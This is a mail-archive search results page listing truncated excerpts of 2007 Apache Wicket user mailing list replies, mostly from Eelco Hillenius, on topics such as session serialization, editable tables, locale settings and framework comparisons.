Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
On 8/14/07, Alex Objelean [EMAIL PROTECTED] wrote: In wicket-1.2.6 I used this in order to not serialize session attributes: [CODE] getDebugSettings().setSerializeSessionAttributes(false); [/CODE] What is equivalent for this in wicket-1.3.0-beta2? Thank you! There is none, but if you
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
On 8/14/07, Eelco Hillenius [EMAIL PROTECTED] wrote: On 8/14/07, Alex Objelean [EMAIL PROTECTED] wrote: In wicket-1.2.6 I used this in order to not serialize session attributes: [CODE] getDebugSettings().setSerializeSessionAttributes(false); [/CODE] What is equivalent
Re: Client Timezone in ClientProperties
I see that there is a method called getTimezone() on the ClientProperties object. The javadoc for it says Get the client's time zone if that could be detected. I tried to get this property, by submitting request from various browsers on various platforms, but it always returns null. Can
Re: Caching the context path
Is this a bug? If so, where should I look to fix this? Wicket 1.2 was gready in determining and using the path. I think what you want should work with Wicket 1.3. Didn't test it yet though. Eelco - To unsubscribe, e-mail:
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Eelco, the ISessionStore interface has a lot of methods.. can you give me an example of how to get rid of the serialization? It really slows down the application. I can imagine those checks did cost something in 1.2, though with Wicket 1.3 and the way we use it with the session stores should
Re: Wickest way to format a label before render
On 8/15/07, Francisco Diaz Trepat - gmail [EMAIL PROTECTED] wrote: done. but How about using your book? Come on... Are you intentionally building momentum? kind of like Hollywood blockbusters? :-) Are you enjoing our geeky intrigue? Thats not right mister... /stephen_colbert jaja
Re: Wicket vs. ZK
I searched the threads on this forum but didn't find any discussion on comparing Wicket with ZK (), the #1 Ajax project on sourceforge.net now. I read a lot on both frameworks and they both seem nice from the feedback of the users. Since I am about to choose one web framework, I
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Eelco, you're right! The latest profiling shows where the bottleneck is... it is indeed not where I was looking for. I thought it was because of serialization because when using 1.2.x branch i found out that setSerializeSessionAttributes(false) improved a lot application responsiveness.
Re: Wicket vs. ZK
We've been using wicket for a couple of months now, our first application is about to be deployed, so I looked back at the templates and started wondering how much this separation of concerns applies to us. We have a base page with some panels supplied by subclasses, then those panels are
Re: setSerializeSessionAttributes in wicket-1.3.0-beta2
Well, in this case the bottleneck was caused by an expensive call which was not cashed inside a very long list... Anyway, profiling tools helps very much in such cases, so I would recommend everybody who have performance issues to use it. :) Yeah, for sure. Which tool are you using? We are
Re: 1:1-translation from html [was: Wicket vs. ZK]
in fact, select, choices (and radio) are still a weak part in wicket (imho). there are many classes to deal with them, but most aren't customizable enough and/or require different markup (span instead of select) as the designer would put in. It's certainly not a perfect framework, and we need
Re: Namespace change for Wickets xhtml tags in 1.3?
I guess we should. You mind opening a feature request for that? Eelco On 8/14/07, Erik van Oosten [EMAIL PROTECTED] wrote: Hi, Since the namespace for Wicket tags is now; I was wondering whether this will change in 1.3. I only found one incomplete thread
Re: Slider Component
I am relatively new to Wicket and just hooked to it. Thanks for creating such a good framework without any messy xml or configuration files. I just wanted to know if there are any good open source Slider component available and can be integrated with Wicket? I have found ZK, Prototype GI
Re: Editable DataTeble
Thanks gumnaam! Without the tree I would be exactly what I need. I gonna try it. Try adding columns to your datatable with EditableLabel components. Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands,
Re: Editable DataTeble
On 8/19/07, fero [EMAIL PROTECTED] wrote: I got it working:) The only thing to consider still is that if you make them all text fields, your browsers may have problems displaying them if they are too many. A whole bunch of text fields may also clutter the display quite a bit. If you use
Re: Editable DataTeble
On 8/19/07, fero [EMAIL PROTECTED] wrote: I see, but I don't know how to do editable labels. I could not find it among wicket/wicket-extensions classes. Plz tell me how to do them. See org.apache.wicket.extensions.ajax.markup.html.AjaxEditableLabel. You could use it like: item.add(new
Re: London Wicket - Bean Editor talk available on-line.
On 8/19/07, Martijn Dashorst [EMAIL PROTECTED] wrote: Keynote '08 just works Under file you can record your audio. If that is done, you can export it to swf, mov with audio. Neat. I'll have to try that sometime :) Eelco -
Re: Problem following TextField example
Hi !! I'm following TextField example at (sorry long line) After failing for a while I've found these differences in the generated html code: In the
Re: Problem following TextField example
you should worry about them. Duh. You should *not* worry about them :) Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Problem following TextField example
Yes, as I said in my last post, I'm using 1.2.6, last stable version as of some two or three days ago. Thanks for your example !! That's why those two URLs are so different. What is not clear to me is what exactly goes wrong? Do you get exceptions? Or do your models not get upated
Re: SOLVED !! Re: Problem following TextField example
Browsing the forum archive I've found a clue to this issue: In web.xml I've changed the line url-pattern/wicket/url-pattern, adding a url-pattern//url-pattern as another url pattern and now it doesn't give an error. Can you give us your whole url-pattern section please? Note that it
Re: SOLVED !! Re: Problem following TextField example
servlet-mapping servlet-nameWicketApplication/servlet-name url-pattern/wicket/url-pattern /servlet-mapping servlet-mapping servlet-nameWicketApplication/servlet-name url-pattern//url-pattern /servlet-mapping I'm using Netbeans 5.5.1
Re: How to set wicket's locale?
On 8/21/07, Johan Compagner [EMAIL PROTECTED] wrote: then you browser tells wicket that it should use English . But you can set it yourself: Session.setLocale() Or if for instance you want to fix the locale to always use a certain one, use a custom session and set the locale it's constructor.
Re: wicket vs tapestry ?
On 8/22/07, Alex Shneyderman [EMAIL PROTECTED] wrote: I just started to look for a component based framework. I came across both tapestry and wicket (and it would be hard not to as you guys share the same host) but I kind of fail to see what the differences are? From my limited experiments
Re: wicket vs tapestry ?
Eelco Hillenius wrote: You can download the first chapter of Wicket In Action for free here: and some chapters of Tapestry In Action Wow, Wicket In Action, we're all were waiting for it :-) Is this early access edition mature enough to buy or it's better
Re: keyboard shortcuts in wicket ?
On 8/21/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Hi I once started a wicket stuff contrib, called wicket input events. Which were gonna be all about input events like mouse events and key events. It never got that far because I didnt really needed it. Nothing beats
Re: wicket vs tapestry ?
On 8/22/07, Chris Colman [EMAIL PROTECTED] wrote: Hi Eelco, I saw you mention Hibernate in the intro but I've been using JPOX with great success with Wicket also. You might want to mention that in the book or new comers might think Wicket is a Hibernate only framework. I use JPOX through
Re: wicket vs tapestry ?
On 8/22/07, Martijn Dashorst [EMAIL PROTECTED] wrote: You mean the wicket-phonebook? Yeah. Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Page and compoenent level feedback are mixing together
On 8/22/07, Igor Vaynberg [EMAIL PROTECTED] wrote: you have to create your own custom feedback filter. this is simply how wicket feedback works. it is stored per page, and if you want to filter it you have to do it inside the panel. Still, using these filters is a bit clumsy imo. I can see
Re: wicket vs tapestry ?
But since I'm currently learning, I can't help wondering at each step where the data gets stored magically. Likely that will go away once I know my way around Wicket. It's also not a complaint, just part of getting to know the best way of doing things. I think it's a very good idea you have
Re: Page and compoenent level feedback are mixing together
what we need to do is collect usecases from our users. Agreed. Users please give your say! what you propose sounds great if you are doing component-hierarchy based filtering - but is this common. I think this is a natural way of thinking about it yeah. And I think it is better than not
Re: wicket vs tapestry ?
If you're interested, a contribution for the address book example with exPOJO/ JPOX would be more than welcome. Definitely, not a problem. When do you need it by? Whenever you feel like it. Where can I find the spec for the address book app? No spec, only code :)
Re: wicket vs tapestry ? (Back Button Detection-Support)
On 8/23/07, William Hoover [EMAIL PROTECTED] wrote: Possible starting point for a client solution for back button detection/support: Thanks for suggesting. We have discussed that and other
Re: Constructor of Component not DRY?
hmmm... that would go against my taste of chaining from the constructor with the least parameters to the constructor with the most parameters. I'd just tend to chose the constructor with the most complex signature as the default constructor, doing the 'real' construction part of the object
Re: [Wicket-user] Wicket in Action now available through Manning Early Access Program
On 8/24/07, Swaroop Belur [EMAIL PROTECTED] wrote: Well, i had the same bad luck as India is not in the choice. They asked me to get a paypal account Great. Largest software country in the world by now? So does it work with paypal then? For all countries? Eelco
Re: Component Factory and code against interface
On 8/24/07, Johan Compagner [EMAIL PROTECTED] wrote: We can do that because all our components implement specific interfaces which changes the state of the component. For example interface ILabelMethods { setBackground(Color color) setForeground(Color color) // and so on }
Re: DataView and onComponentTag
On 8/24/07, Igor Vaynberg [EMAIL PROTECTED] wrote: dataview doesnt have its own markup, it delegates it to its direct children. so you want to put that oncomponenttag into the item the dataview creates. override dataview.newitem() and override oncomponenttag on the returned item. It would
Re: DataView and onComponentTag
On 8/24/07, Igor Vaynberg [EMAIL PROTECTED] wrote: or we can forward the call to the repeatermore intuitive for newbies less intuitive for the rest :) The items would forward the calls? Hmmm. Sounds a bit dangerous/ confusing. Eelco
Re: Alternative to Wicket data binding
On 8/25/07, Matej Knopp [EMAIL PROTECTED] wrote: But the binding is as pluggable as possible. You can write any IModel implementation you want. Think of (Compound)PropertyModel as pure convenience implementation (that works for 99% usecases). With wicket, you don't think of mapping http
Re: Alternative to Wicket data binding
On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i think that is a foolish argument as you are assuming property model should only work on _beans_ it is perfectly normal to do something like this: class data { public String name; public int age; } Yes, I hope you didn't really think that I
Re: Alternative to Wicket data binding
On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: On 8/25/07, Eelco Hillenius [EMAIL PROTECTED] wrote: On 8/25/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i think that is a foolish argument as you are assuming property model should only work on _beans_ it is perfectly normal to do
Re: Alternative to Wicket data binding
I fail the see the logic in that, sorry. Why just not throw any scope limiting away? in this particular case: yes. dont forget that property model is entirely about convinience in the first place, and flattening scopes is just another part of that convenience :) So you write a class with
Re: Alternative to Wicket data binding
yes it is the second time this topic comes up out of how many of thousands of users there are i dont know. i think this feature is very convenient. it is not something you can toggle on and off because 3rd party components might be written with this in mind. so i would say keep it, end
Re: AJAX form submit and validation
On 8/26/07, Ian Godman [EMAIL PROTECTED] wrote: Thanks but this does not solve my problem. I am submitting the form via ajax using an AjaxSubmitLink. If the form has errors on it then I do not get the submit, if the form has no errors then the submit code runs ok. The errors are not
Re: Newbie questions
On 8/26/07, Otan [EMAIL PROTECTED] wrote: I hope that chapter on Models be free to download as well for the benefits of newbies. Sorry, I'm afraid we can't do that. Only chapter 1 is free to download. Eelco - To unsubscribe,
Re: DownloadLink hanging
On 8/27/07, Thomas Singer [EMAIL PROTECTED] wrote: Isn't fixing bugs the task of the Wicket developers? We don't have a problem ordering support, but I could not find information where to get it. It's unfortunate you have an urgent problem. Sorry about that. However, everyone of the development
Re: DownloadLink hanging
On 8/27/07, Thomas Singer [EMAIL PROTECTED] wrote: Your best bet on getting quick support is to fix it yourself and send in a patch. Well, if that would be possible, I would have done that or worked around it myself (like done with some own components).
Re: What's the minimum dependence of Wicket 1.3 beta2?
Read the maven documentation and understand the pom. That's definitely something I don't want to do. It has become harder in a not so small number of cases to build things from source since there are different and incompatible versions of maven - even more so since some maven repos don't
Re: Listview / input components repaint via ajax?
I have a listview in a panel. I have a ajax link to add items to the list. When I click the link the listview are repainted, because I have it in the markupcontainer just as it should. In the listview there are some textfields, these are cleared when the markupcontainer are repainted, I dont
Re: DatePicker
On 8/27/07, fero [EMAIL PROTECTED] wrote: Which components work with DatePicker except the TextField? I would like to use Label. Is it possible? We're talking about the one in wicket-datetime, right? Not entirely sure, but I think it should. Could you please just try? Make sure your label
Re: What's the minimum dependence of Wicket 1.3 beta2?
i just wanted to express, that not anyone trying to build a webapp with wicket is a maven expert or wants to become one (i don't want either). Agreed. so, when someone asks a question on dependencies, i find it somewhat 'rude' to just come in with a comment suggesting 'maven can tell it,
Re: unable to set content type
Wouldn't you use text/xml for that? Eelco On 8/15/07, Ryan Sonnek [EMAIL PROTECTED] wrote: I'm having some baffling behavior with my app. I have a custom web page that streams page xml content. I thought this would be pretty straightforward. should be able to just do this right?
Re: How to replace panelA with panelB using AjaxLink in panelA
On 8/13/07, Tauren Mills [EMAIL PROTECTED] wrote: My use case can best be described as making wicket-phonebook work within a single tab of a tabbed panel using AjaxLink for create, edit, and delete. Thus, I have a page that contains a TabbedPanel. One tab of TabbedPanel contains
Re: TreeTable question
On 8/14/07, Doug Leeper [EMAIL PROTECTED] wrote: I am using the Tree Table component in Wicket Extensions. I would like to do the following: Background: I have N number of columns: Column 1: operation panel (operations available for the particular tree node item) Column 2: the tree node
Re: Redirected after BrowserInfoPage and mounted Pages.
This was a bug. See WICKET-896. Thanks for reporting, it is fixed now. Eelco On 8/20/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Short description :- When using mounted pages, wicket redirects to wrong URL, after BrowserInfoPage, which is called by Session.get().getClientInfo(), when
Re: NullPointerException when resolving a class
I am trying to upgrade to wicket 1.3. I was running 1.2.6 with no problems. When trying to resolve the class for this markup: bundleresource://88/com/company/package/MyClass$WelcomeLabel.html in MarkupResourceStream, the method: public Class getMarkupClass() { return
Re: conditional markup change with AjaxEditableLabel
On 8/24/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Hi, i am using a subclass of AjaxEditableLabel. This one works fine so far but I have one Problem. If the value of the label is 0 the markup should change. I tried it this way with no effect. public class MyAjaxEditableLabel extends
Re: Using ClientProperties Object for User selectable Timezone.
On 8/21/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Currently ClientProperties object has a getTimeZone() method, that uses BrowserInfoPage's response, to calculate a client's Timezone. Would it be too much trouble to add a setTimeZone() method, so that the TimeZone property is user
Re: WicketSessionFilter
On 8/25/07, Nick Ward [EMAIL PROTECTED] wrote: I want to have a separate servlet to go along with my wicket application that can serve streaming files. However, it needs to have access to the wicket session to know what to stream. I was thinking about using a WicketSessionFilter to help me do
Re: wicket contrib yui
On 8/27/07, James McLaughlin [EMAIL PROTECTED] wrote: Yes there is. I haven't had much time to see what the impact of the change would be, but I set up YuiHeaderContributor to be able to select versions. If you have the time and inclination, you can setup the 2.3.0 library under
Re: hierarchy does not match
On 8/28/07, Kees de Kooter [EMAIL PROTECTED] wrote: Hi Igor, What kind of information would you like to have? Source code? I did attach the entire exception page. The Apache mailing lists don't allow attachments, so that got filtered. Furthermore, a relevant piece of code usually helps us
Re: Is Wicket a proper framework for a Webshop ?
If you're looking for a good action oriented framework - check out Stripes - I hear it's very good at what it does. The other alternative is Struts 2, but I hear people prefer Stripes. Spring MVC seems to be getting a little behind... imho any action oriented/ model 2 framework doesn't help
Re: Is Wicket a proper framework for a Webshop ?
For the record I completely agree with you :) I'm in the process of slapping the developers around here, trying to get them to wake up. Senior dev's recommending struts 1 for gods sake... now that's what i call afraid of change It's out of ignorance, and their unwillingness to see what
Re: Is Wicket a proper framework for a Webshop ?
On 8/29/07, William Hoover [EMAIL PROTECTED] wrote: Could you elaborate on what is lacking in Wicket when referring to the back button support (when compared to GWT)? I was under the impression that Wicket had robust back button support? Wicket's back button support is pretty robust for
Re: Is Wicket a proper framework for a Webshop ?
On 8/29/07, Gerolf Seitz [EMAIL PROTECTED] wrote: google wicket-bench -igor i know wicket-bench, have used it for wicket 1.2 actually. oh, and i like mark occurences too ;) And to make it complete, there is supposedly nice support for Netbeans as well:
Re: Wicket getting some bad press at Slashdot.org
On 8/29/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Over in the Slashdot article about GWT in Action there are some negative opinions toward Wicket expressed. Just thought I'd mention it in case any of the gurus want to weigh in too. (Head over to this link, set the threshold to 4, then
Re: best practice for a header component with links defined by the page
So let me try to rephrase your problem: you have a header component that shows a variable number of components (links). Use a repeater (e.g. list view or repeating view) for the variable number of components, and you probably want to wrap the header component in a panel so that it is easy to move
Re: Wicket capability for LARGE forms
On 8/29/07, Antony Stubbs [EMAIL PROTECTED] wrote: I have a couple of pages with _very large forms_, that are also modified dynamically to set which fields are editable using javascript, dependant on the value of a drop down list. Please see the example image attached. And that's only the
|
https://www.mail-archive.com/search?l=users@wicket.apache.org&q=from:%22Eelco+Hillenius%22
|
CC-MAIN-2022-05
|
refinedweb
| 5,537
| 63.19
|
Docker is a Platform as a Service (PaaS) product, using which developers can build, ship and run their applications inside Docker containers. Now used everywhere, it is the new way of application deployment. The Docker Toolbox, Docker Desktop and the Windows Subsystem for Linux (WSL) are all designed to expand its reach and make life easier for developers.
Docker has revolutionised the DevOps pipeline. A Docker image, as most of us know, is a static representation of the application, as well as its configuration and dependencies. These images are stored in a remote public registry, called Docker Hub. Thus, to run an application stored as an image, we must pull the image and run it in a container. For those who do not have any background knowledge about Docker, a container is a live instantiation of an image. As Docker has become a huge success, one might want to learn about this technology without having a separate Linux installation. This is where Docker for Windows comes in. It not only allows you to run Docker service on Windows but also provides a nice GUI for those who are not very comfortable with the command line interface (CLI). Let us see what Docker for Windows can offer to its users.
Docker Toolbox
If your Windows is older than 16299 and does not satisfy the requirements of the new Docker Desktop, then Docker Toolbox can help you. Docker Toolbox is not managed by Docker but is available for use on GitHub. It provides you with a Docker Quickstart Terminal, Kitematic, and Oracle VirtualBox. Docker Quickstart Terminal is a preconfigured Docker CLI, while Kitematic provides a GUI for Docker. Docker engine commands like docker-machine and docker-compose are also included.
The questions that arise are: how is Docker Toolbox enabling us to use Docker on Windows? What is the technology underlying it? As stated earlier, Docker Toolbox includes Oracle VirtualBox as well. What could be the purpose of a virtual machine in using Docker on Windows? Let’s answer these questions.
Linux-specific kernel features namespace and Cgroup, which are used by the Docker Engine Daemon. Thus, running Docker inherently on Windows is not possible. So, the Windows system hosts the Docker Engine on a compact Linux virtual machine, which is created by Docker Toolbox using the Docker machine command for creating and attaching this machine. Also, this machine is very small and may not run many commands. Let us look at the installation process and how the toolbox can be used.
Installing Docker Toolbox
Before installing Docker Toolbox, ensure that your system has 64-bit Windows 7 or higher, and virtualisation is enabled.
The installation steps are as follows:
- Docker Toolbox is no longer maintained by Docker, so download it from the GitHub URL at. Download the .exe file.
- Double click the installer for installing Docker Toolbox.
- If your system already has VirtualBox installed, uncheck it. Also, if VirtualBox is running, stop it before installing Docker Toolbox.
- Accept all other default settings and install Docker Toolbox. Once it has been successfully installed, it can be verified by the three new icons on your desktop, namely, Docker Quickstart Terminal, Oracle VirtualBox, and Kitematic (Alpha).
Docker Quickstart Terminal
To start using Docker on Windows, click on Docker Quickstart Terminal. This launches the pre-configured Docker Toolbox terminal, which sets up everything on its own. Choose ‘Yes’ each time it prompts for permission. This terminal runs the bash shell instead of the Windows command prompt, as Docker needs it for running.
Once the setup is completed, a Docker shell will show up, and you can verify by executing the command docker —version.
This terminal supports all Docker commands like pulling an image from the Docker Hub and running a container from the pulled image. We can also commit and push an image to Docker Hub.
Let us create a container using Docker Quickstart Terminal with a Jenkins image running in it. The command for this is docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts. Figure 1 shows the above Docker command in execution.
Now, let us see how we can publish an image to the Docker Hub Registry. For this, run the following commands:
$docker commit <container_name> <docker_hub_repository>/<new_image_name>:<image_tag> $docker login $docker push <image-name>:<tag>
Note that these commands can be used to publish the image to any Docker Registry.
Figure 2 shows how an image can be published to the Docker Hub Registry.
Let us explore this terminal by trying some other commands. Figures 3 and 4 show some basic Linux commands that do not run on Docker Quickstart Terminal and those that run on the terminal, respectively.
Kitematic (Alpha)
This is for software engineers who are not at ease with the CLI and Docker commands. Kitematic offers a GUI for working with Docker images and containers. Most of the basic functions can be executed with it. For using it, you must create a virtual machine when asked, and login with your Docker Hub ID.
In the left panel of Kitematic GUI, you will find the list of all stopped and running containers. The main panel lists all the recommended images from Docker Hub and the images in your own repository too. We can search for images and create new containers by clicking on Create. We can also specify port numbers, version, and tag of the image that we wish to pull.
On selecting a particular container in the left panel, a new view shows up. As we have run a Jenkins image on port number 8080, we can see the container logs in the main panel and Web Preview on the top right panel. Volumes are shown in the lower right panel. Output of container logs is shown in Figure 5.
We can also view and update container properties from the Settings panel. Settings shows all the container properties like container name, environment variables, exposed ports, networks, etc. We can always go to this panel and change the settings as required. Thus, with the Kitematic GUI, it has become easier to create and manage containers. Figure 6 shows the Settings of the Jenkins container.
Image migration
Migration of Docker images from Docker Toolbox to Docker Desktop can be easily done by saving the image as a tar file by following these steps:
1. Create a separate directory for Docker images and give it all the permissions as in the commands given below:
$mkdir ~/docker-images $cd ~/docker-images $chmod 777 ./
2. Use the docker save command for creating a tar file:
$docker save <image_id> -o ./<image_name>.tar
3. The tar file can be found in the docker-images directory.
This tar file will be loaded on to the Docker Desktop using the docker load command, details of which will be covered later in the article.
If Docker Toolbox is great, why Docker Desktop?
Docker Toolbox has certain issues that Docker Desktop solves. A virtual machine is no longer a good option for Docker installation as new and better technology such as ‘Windows Subsystem for Linux’ is available and Docker Desktop uses this. also, not all operations are possible with Kitematic. The option of pushing images is missing, and many tabs do not work as expected. Based on our experience, we recommend Docker Desktop rather than Docker Toolbox. If your system cannot support Docker Desktop, then Docker Toolbox is a good option for using Docker on Windows. The uninstallation procedure for Docker Toolbox is available at.
What is WSL?
Consider the task of running Linux distros on Windows machines. The obvious solution that comes to mind is running it in a virtual machine. Software like Oracle VirtualBox and VMware Workstation can help us with that. The software allocates some fixed computing resources to the virtual machine. Using a virtual machine puts heavy load on the host machine. This is because virtual machines use a static allocation of resources. Hence, when it is running, a chunk of the host machine’s resources get blocked, which deteriorates its performance. Also software like Oracle VirtualBox and VMware Workstation are type-2 hypervisors, which means they access the host machine hardware indirectly through the host OS. This slows down the virtual machine too. Life would be much simpler if we could directly run our Linux distros without the involvement of such software.
If there were ways using which we could use basic Linux tools and applications directly on Windows, all our worries would have gone away. Windows Subsystem for Linux (WSL) does exactly this. WSL allows us to run distros available on Microsoft Store on Windows machines. It allows processes running in Windows and Linux to communicate with one another. A client-server application stored on a Windows file system may have its GUI (client-side) running on Windows and its server-side running on Linux. Thus, WSL makes it possible to develop applications that can run on both Windows and Linux simultaneously.
WSL uses a hyper-optimised lightweight virtual machine, which is different from traditional virtual machines. It boots up in very little time and is completely managed by Windows itself. Thus, external software (like VirtualBox) is not needed.
WSL 1 vs WSL 2
WSL 2, released after WSL 1, is an improvement over the latter. The file system performance is much better in the second version. Also, it supports all the system calls supported by the Linux kernel. A detailed comparison between WSL 1 and WSL 2 is shown in Figure 7. WSL 2 enables virtualisation through the native virtualisation technology of Windows OS and Hyper-V. It does create a virtual machine behind the scenes, but the creation is done by WSL 2 in a highly optimised manner. It ensures less resource utilisation by allocating resources dynamically as and when required by the virtual machine. Also, Windows automatically switches off inactive virtual machines. This contributes to reducing the time to start the virtual machine.
Currently, WSL 2 is available by default in Windows 10 Version 2004. However, users of Windows 10 Version 1903 (build number 18362.1049+) and Windows 10 Version 1909 (build number 18363.1049+) can manually upgrade to WSL 2. Follow the steps given in the next section to do so. Windows also allows both versions of WSL to run in parallel. We can run Ubuntu distro on a Windows machine with WSL 2 and Kali Linux with WSL 1.
Install WSL 2
To install WSL 2 on Windows 10 Version 1903 or Windows 10 Version 1909, follow the steps given below.
- Before installing WSL 2, you need to make sure that your OS build number is appropriate. To check this, do the following:
a. Press the Windows key + R and enter winver.
b. Click on OK. This shows the OS build information in a new window.
- If your OS build number conforms to the above-stated requirements, then skip this step. Otherwise, you need to update your OS to the latest version. This can be done by checking for available Windows updates and installing them. The steps for the same are given below:
a. Click on the Start button and open Settings. Then go to Update and Security.
b. Click on Check for updates and install all the available updates.
- Now, we need to enable the WSL and virtual machine platform features of Windows. For this, run the following commands in Windows PowerShell with administrative privileges:
$dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart $dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
4. Download the latest Linux kernel update package from for x64 machines and from for ARM64 machines. The command systeminfo | find ‘System Type’ shows the architecture used in your system. This will help you select the appropriate package.
5. Run the package downloaded in the previous step.
6. Restart the machine to finish WSL 2 installation.
To know more about the nuances of each step or about troubleshooting errors, visit.
Docker Desktop for Windows
Docker Desktop is an application that can be used on Windows for the development of containerised applications. It includes Docker Engine, Docker CLI client, Docker Compose, Notary, Kubernetes and Credential Helper. Using Docker Desktop, we can build and publish Docker images, run them in Docker containers, get information about the resource utilisation of containers, and much more, all through a user-friendly GUI. For experienced users, it also provides a CLI client. Docker Desktop also allows us to access the Docker Hub repository from its interface. Thus, we can download images from public repositories and private repositories.
But why is using Docker on a Windows machine difficult and not as seamless as in the case of Linux machines? What are the mechanisms that make this possible? The limitation of Docker is that it can only run on the Linux kernel since type-1 and type-2 hypervisors use hardware-level virtualisation, whereas containers use kernel-based virtualisation. To run Docker on Windows, we need virtualisation software that can emulate a Linux kernel. Docker Desktop utilises Microsoft’s Hyper-V hypervisor, which is a native hypervisor capable of creating virtual machines on x86-64 machines running the Windows operating system. Figure 8 shows how any Linux distribution can run on a full Linux kernel made available by WSL 2.
Docker Desktop integrates easily with WSL 2 and can be run with the WSL 2 backend, as it takes advantage of the full Linux kernel and Linux system call support provided by WSL 2. WSL 2 allows users to use Linux workspaces, and hence developers do not have to write different build scripts for Windows and Linux machines. The WSL 2 backend greatly reduces the resource requirements of running a container. This is because WSL 2 makes sure that Docker Desktop uses up memory and CPU only in the required amounts. The direct advantage of this fact is that the current version of Docker Desktop brings down the Docker daemon startup time to less than 10 seconds. Adding to this, when WSL 2 is running in a Windows machine, Docker commands can even be executed directly from Windows PowerShell.
It is very easy to install and run Docker Desktop with the WSL 2 backend. First, enable WSL 2 in your machine if it is not already enabled. Then, follow the given steps.
- Download the latest stable release of Docker Desktop for Windows from.
- Run the downloaded installer by double-clicking it and following the instructions. Turn on the WSL 2 feature if prompted during installation.
- A Start menu entry of Docker Desktop gets created. Launch Docker Desktop from there.
- Go to the General tab on the Settings page.
- Select the ‘Use WSL 2 based engine’ checkbox if it is not selected by default, and then click on the Apply & Restart button.
Now, let us learn how to perform some basic operations using Docker Desktop GUI.
In the bottom-left corner, we can see the status of the Docker service. The left panel lists two tabs – Images and Containers/Apps. The Images tab shows various images created locally as well as in the private repository on Docker Hub. We can pull images from the Docker Hub repository by clicking on the Pull button that appears when we hover the mouse pointer over an image. The pulled image will then get listed in the local images tab. To run an image in a container, click on the Run button beside each local image. The new container window will open. Enter details like container name, port mappings, and volume mappings, and then click the Run button. This creates a container shown in the Containers/Apps tab, along with other containers created by us. Clicking on any container name shows the Details page of the container. This page has three options:
Logs: This shows the container output and logs generated during container execution, as shown in Figure 9.
Inspect: This shows various properties of the environment setup in the container. This includes properties like environment variables, ports, and volumes bound to the container, as shown in Figure 10.
Stats: This shows various container statistics like memory usage, CPU usage, data read from and written to the disk, and data sent and received over the network, as shown in Figure 11.
One of the main advantages of using Docker Desktop on top of WSL 2 is that it allows us to execute Docker commands directly from the Windows PowerShell. The following command pulls the Jenkins image from Docker Hub (if not available locally) and runs it in a container:
$docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts
You can save the container as an image by running the following command:
$docker commit <container_name> <docker_hub_repository>/<new_image_name>:<image_tag>
Remember the image we saved as a tar file for migrating it from Docker Toolbox to Docker Desktop? It is now time to load that image. Run the following command to do so:
$docker load --input <image_name>.tar
Today, Docker has become an integral part of all DevOps (including DevSecOps, GitOps, AIOps, MLOps, etc) pipelines. It makes developing, building, and shipping containerised applications very easy. By using Docker containers, developers have to worry less about project dependencies as well as differences between development and deployment environments. Docker for Windows is another step towards this, as now different developers in a development team may use different operating systems and still collaborate seamlessly. WSL 2 makes it even easier to run Docker on Windows. For developers using older Windows systems, Docker Toolbox makes it possible for them to use Docker. All in all, it just helps developers to focus more on development and less on maintaining the environment.
|
https://www.opensourceforu.com/2021/02/the-benefits-of-docker-toolbox-docker-desktop-and-wsl-2/
|
CC-MAIN-2021-39
|
refinedweb
| 2,943
| 56.25
|
This demo shows how it is possible to simulate a 3D scene in SVG, with the restriction that all the objects in the scene remain flat, and parallel to the projection plane (i.e. the screen). This is a setting similar to traditional cartoon animation where characters and scenery are painted on celuloid sheets ('cels'). The cels are then stacked together on a rostrum, to which proper lighting and additional effects are applied, and the final frame is shot on film.
Since the final setup is always a superimposition of 2D drawings, appropriately zoomed and positioned, it is possible to simulate it in SVG.
(I know the graphics could look better, but I'm not an artist. I prefer doing the maths. I used Amaya to edit the cels, by the way.)
Clicking and dragging the mouse will move the observer within the X-Y plane. If a key is pressed, clicking and dragging will make the observer move along X and Z, i.e. back and forth into the scenery. Rendering each frame is rather slow, so it might be desirable to turn off 'Higher Quality'. This simpler version should display faster:
Have a look at the source and read on, it's quite simple if you know a little bit of SVG and ECMAScript.
The cels are defined by one
<g> element
containing an
id attribute called "cels". The child
elements can be other
<g> elements or any
primitive. Each child element should contain a
depth
attribute from the
namespace, which indicates the position of that cel along the Z
axis. If
depth is not specified, the depth is 0.
The ECMAScript script contains the position of the observer, the code to compute the final position and scale of each scale and the code to allow interactive motion. Interesting variables are
What the rest of the code does is let the user change the position of the observer through mouse movement and from the new position and then render the frame. Of course other means to change the position of the observer are possible, like a predefined path in 3D space for an non-interactive animation.
Dan Brickley gave me the idea of doing this when showing me a demo. Vincent Hardy and Dean Jackson provided help on SVG, especially about going around flaws in implementations.
|
http://people.w3.org/maxf/Parallax/
|
crawl-002
|
refinedweb
| 388
| 69.92
|
Assign the size of userInput to stringSize. Ex: if userInput = "Hello", output is:Size of userInput: 5
#include <stdio.h>
#include <string.h>
int main(void) {
char userInputArray[50] = "";
int stringInputSize = 0;
strcpy(userInputArray, "Hello");
/* Your solution starts here */
printf("Size of userInputArray: %d\n", stringInputSize);
return 0;
}
Please learn to use the Debugger, it will help you to see that what your code is doing, believe in me, it will help you to understand what is wrong.When you don’t know what your code should be doing or why the does what it does, the answer to this is Debugger.You can use the debugger to see what your code is actually doing. You need to just set a breakpoint and see how your code is performing, the debugger allows you to execute the lines 1 by 1 and to inspect the variables as it executes it, it is an incredible learning tool.The debugger is always here to show you what your code is doing and your task is to compare it with what it should be doing.
Code solution as below :
strcpy(userInputArray, "Hello");
